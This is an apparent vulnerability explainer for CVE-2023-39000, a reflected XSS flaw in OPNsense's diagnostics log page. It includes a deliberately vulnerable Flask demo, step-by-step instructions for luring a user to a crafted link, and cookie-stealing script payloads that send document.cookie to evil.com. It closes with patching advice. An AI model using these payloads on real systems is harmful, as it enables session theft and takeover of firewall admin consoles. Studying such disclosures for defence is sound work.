CVE-2023-39000 - Reflected XSS in OPNsense /ui/diagnostics/log/core/ - Explained with Example, Analysis, and Exploit Details

In July 2023, a critical security flaw was disclosed in OPNsense, a popular open-source firewall and routing platform. This vulnerability, tracked as CVE-2023-39000, is a reflected Cross-Site Scripting (XSS) bug found in the /ui/diagnostics/log/core/ component, affecting OPNsense versions before 23.7. A successful attack lets hackers execute JavaScript in the browser of anyone who clicks a specially crafted link – potentially compromising user sessions, data, and even the management interface itself.

In this post, we’ll break down what this bug is, see some real-world code examples, and walk step-by-step through how an attack can work, all in straightforward language.

Reflected XSS is a common web security issue. Here’s how it works in basic terms

- A website takes something from the URL (like a query string or path) and displays it back on the page without checking or cleaning it.

The script runs in the victim's browser as if it came from the trusted website.

Result: The attacker can steal cookies, deface pages, or hijack accounts.

In OPNsense, the web management console has a diagnostics page under the path

/ui/diagnostics/log/core/

Versions before 23.7 did not properly sanitize user-supplied input in this component.

What goes wrong?

If someone puts JavaScript code into the URL path, OPNsense reflects it into the server response without cleaning it up. This means attackers can insert JavaScript code that the victim’s browser will execute.

How did it happen?

In the affected code, some part of the request path is shown on the page – maybe as a friendly reminder of what’s being viewed – but the framework fails to escape HTML or JavaScript code in that path.

Vulnerable URL

Any request to /ui/diagnostics/log/core/<payload> where <payload> is attacker-controlled input can trigger the bug.

Suppose the attacker sends someone a link like

https://<opnsense-server>/ui/diagnostics/log/core/<img src=x onerror=alert(1)>

The browser sees the <img> tag and runs its JavaScript (alert(1)).

If the attacker puts more sophisticated code (like stealing cookies), things get worse.

Let’s imagine a simplified Python Flask app with a similar bug

from flask import Flask, request
app = Flask(__name__)

@app.route('/ui/diagnostics/log/core/<path:log>')
def show_log(log):
    # VULNERABLE: no escaping!
    return f"<html><body>Currently viewing logs: {log}</body></html>"

# Run with: flask run

If you visit

http://localhost:500/ui/diagnostics/log/core/<img src=x onerror=alert(1)>

You’ll get popped with an alert! The bug in OPNsense is of a very similar flavor.

Craft a malicious URL (replace the server and port as needed)

https://your-opnsense/ui/diagnostics/log/core/<img src=x onerror=alert('xss')>

Trick a user into clicking the link. This could be via email, chat, internal docs, etc.

5. When the link is clicked and the server is vulnerable, the alert will show, proving code execution in the browser.

More Malicious Payload

Attackers might use JavaScript to grab cookies or authorization tokens (if not protected by HTTPOnly):

<script>
fetch('https://evil.com/steal?'; + document.cookie)
</script>

Injected as

https://your-opnsense/ui/diagnostics/log/core/<script>fetch('https://evil.com/steal?';+document.cookie)</script>

Privilege Escalation: If the logged-in user is admin, attackers could gain full control.

- Network Attack: OPNsense secures critical networks – if its admin panel is compromised, all connected resources are at risk.

Upgrade OPNsense to version 23.7 or later, where the bug is fixed.

2. Do not click suspicious links from unknown sources, especially when logged into firewalls or routers.

References and Further Reading

- CVE-2023-39000 at MITRE
- OPNsense Changelog 23.7
- OWASP XSS Cheat Sheet

Conclusion

CVE-2023-39000 is a classic reminder that web interface code on infrastructure devices should never trust user input. Even trusted devices like firewalls can be brought down by simple, overlooked bugs. If you use OPNsense, upgrade now! And always stay alert for the sneaky links that can turn your best defenses against you.

Timeline

Published on: 08/09/2023 19:15:00 UTC
Last modified on: 08/15/2023 15:08:00 UTC